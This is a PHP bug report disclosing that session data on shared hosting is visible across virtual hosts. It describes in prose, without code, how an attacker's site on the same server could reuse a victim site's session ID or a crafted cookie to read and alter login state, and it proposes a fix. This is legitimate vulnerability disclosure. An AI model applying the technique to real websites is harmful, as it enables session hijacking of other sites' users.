From: php at ter dot dk Operating system: Linux PHP version: 4.3.6 PHP Bug Type: Session related Bug description: A site's session data is available for all virtual hosts on same server
Description: ------------ This is a security-related issue. I couldn't find any mention of it by searching older bugs or reading the session-page. If several sites are hosted on the same web server - which is the case at most web hosting providers - a site would have access to read and write to a particular session created by another site. Example: Two sites is present at the same server. Site A is beyond our control. Site B is our own website, where we can use PHP. Site A sets a session and puts some data into this. By using the same sessionid in our code at site B, we are able to view and manupulate the session-data only present on the web server. The requirements are that site A provides us with a sessionid and we have access to another virtual host on the same webserver as the site, we would like to attack. This is not directly related to session fixation (the session already exists for the PHP-server). Also, the usage of session.use_only_cookies wouldn't change anything, since we could just craft our own cookie. I don't think that safe_mode could prevent anything, since we are just using the php-based functions and not snooping around the session-temp-dir manually. Reproduce code: --------------- I have put up an example at: http://stock.ter.dk/session.php (as site A) http://peter.plys.net/sessiontest.php (as site B) stock.ter.dk is the victim website where we ordinary would have no access. peter.plys.net is another website running at the same webserver. This would emulate our own website, where we can upload our PHP-code to access and manupulate the sessiondata. Since the sessiondata can contain code about whether we are logged in or not, which user we are logged in as and stuff alike, it might be a pretty serious security issue - although it does require that our site is located the same place as the victim website. Users with dedicated servers would not be at risk Expected result: ---------------- The session data of stock.ter.dk and peter.plys.net would not be shared. Actual result: -------------- The session data of the websites are shared. A solution might be for PHP to add the SERVERNAME to the session-file (eg. "sess_stock.ter.dk_8a392cf...") and maybe an option to session_start() to allow sharing of session (as it is today) if anybody really depends on this "feature". -- Edit bug report at http://bugs.php.net/?id=28242&edit=1 -- Try a CVS snapshot (php4): http://bugs.php.net/fix.php?id=28242&r=trysnapshot4 Try a CVS snapshot (php5): http://bugs.php.net/fix.php?id=28242&r=trysnapshot5 Fixed in CVS: http://bugs.php.net/fix.php?id=28242&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=28242&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=28242&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=28242&r=needscript Try newer version: http://bugs.php.net/fix.php?id=28242&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=28242&r=support Expected behavior: http://bugs.php.net/fix.php?id=28242&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=28242&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=28242&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=28242&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=28242&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=28242&r=dst IIS Stability: http://bugs.php.net/fix.php?id=28242&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=28242&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=28242&r=float
